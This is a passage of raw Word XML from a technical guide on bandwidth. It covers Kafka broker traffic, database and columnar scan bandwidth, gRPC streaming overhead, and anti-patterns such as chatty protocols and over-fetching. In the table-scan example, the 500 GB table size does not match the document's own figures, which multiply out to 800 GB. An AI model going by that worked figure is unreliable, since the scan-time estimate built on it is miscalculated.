              <w:t>90%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3EFDC7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1F2D602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4A02B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>95%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560C94" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>20x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2CEBDC4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CEC8EE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>99%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FF299A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F6F4A44" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This is why latency spikes catastrophically as bandwidth utilization approaches capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80F9CF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="2CF15413">
          <v:rect id="_x0000_i4382" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC2B47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Bandwidth in Specific Protocols and Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E151BA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Kafka and Message Broker Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2E634" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka's bandwidth model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6417D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B4821" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Producer → Broker → Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AED28" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="52D90932" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Producer bandwidth: messages/sec × message_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42B20E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Broker inbound: sum of all producer bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B5BCB1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Broker outbound: inbound × replication_factor + consumer_bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14CB02" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Consumer bandwidth: messages/sec × message_size × consumer_groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCFD8C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C579409" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7159A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>10,000 messages/sec × 1 KB = 10 MB/s inbound per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464AA5C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Replication factor 3: broker-to-broker = 10 MB/s × 2 = 20 MB/s per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E8572D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>3 consumer groups: 10 MB/s × 3 = 30 MB/s outbound per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30652554" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>10 partitions: total broker traffic = (10 + 20 + 30) × 10 = 600 MB/s = 4.8 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355C209" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka bandwidth optimizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01A7C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Producer batching (linger.ms):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Accumulate messages before sending → fewer packets, better compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668EC606" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression (lz4/zstd):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Compress at producer, decompress at consumer. Broker stores compressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FC5B3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero-copy (sendfile):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Broker serves consumers using OS-level zero-copy → no user-space data copying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25601EA0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Page cache utilization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Hot data served from OS page cache (memory speed, not disk speed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383953F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Database Bandwidth Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0189C6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read-heavy workload (cache miss):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F3C62" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C5213" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>10,000 cache misses/sec hitting the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135478B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average row size: 2 KB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14067285" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Database → application bandwidth: 10,000 × 2 KB = 20 MB/s = 160 Mbps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566415AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-heavy workload (WAL + replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0AB59" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA47D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>50,000 inserts/sec × 500 bytes = 25 MB/s WAL writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F026955" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Replication to 2 replicas: 25 MB/s × 2 = 50 MB/s network outbound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8FA923" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total disk bandwidth: 25 MB/s WAL + 25 MB/s data files = 50 MB/s sustained (easily handled by NVMe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34587397" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full table scan (analytics):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40573375" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DF3E8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Table: 500 GB, scanning 100 columns × 8 bytes × 1 billion rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62F467" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sequential scan speed (NVMe): 3 GB/s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E470DA0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Scan time: 500 GB / 3 GB/s = 167 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E296DB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bottleneck: disk bandwidth (not CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC22056" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Columnar storage advantage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F2F5F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Only read the 5 columns needed: 5 × 8 bytes × 1B rows = 40 GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA94F31" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Scan time: 40 GB / 3 GB/s = 13 seconds (12x faster due to reduced bandwidth needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234FD20F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 gRPC Streaming Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A5953" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unary RPC vs. Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018190C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Unary (10,000 separate calls/sec):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B2084" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B5113" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">10,000 × (HTTP/2 frame overhead ~9 bytes + headers ~50 bytes + payload 100 bytes) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A24B80" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 10,000 × 159 bytes = 1.59 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737423E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server-streaming (one call, 10,000 messages streamed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF52F13" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BAA9E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>1 × (headers + frame overhead) + 10,000 × (frame overhead 9 bytes + payload 100 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D4A82" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 159 bytes + 10,000 × 109 bytes = 1.09 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD058A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Savings: 31% less bandwidth (amortized per-call overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE51EE9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For high-throughput data pipelines, streaming eliminates per-request overhead, improving bandwidth efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFA564" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="41333817">
          <v:rect id="_x0000_i4383" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8B183" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Bandwidth Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161ED3AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 The Chatty Protocol Anti-Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB224F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Making many small network calls instead of fewer larger ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B500CB6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09047E0F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bad: 100 calls × 100 bytes payload = 10 KB of useful data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64B40F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     But: 100 calls × (100 bytes payload + 200 bytes overhead) = 30 KB on wire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C562E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">     Plus: 100 round trips × 5ms = 500ms total latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762D511" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="7594A30C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Good: 1 batch call × 10 KB payload = 10 KB of useful data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FF433" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">      On wire: 10 KB + 200 bytes overhead = 10.2 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8837A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">      Latency: 1 round trip × 5ms = 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CB9D17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common manifestations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5667A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>N+1 query problem (fetch list, then fetch each item individually).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D25106" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Fine-grained microservices making 50 RPCs to render one page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B1C3C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client polling every second for updates (instead of WebSocket/SSE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F70775" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Sending More Data Than Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5EF4A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Over-fetching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C19D746" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>REST API returns entire user object (50 fields, 5 KB) when client needs only the name (20 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664A021" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Solution: GraphQL, sparse fieldsets (?fields=name), or dedicated endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FC3AA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not using pagination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE23B02" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client requests "all orders" → server returns 100,000 orders → 500 MB response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE84EF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
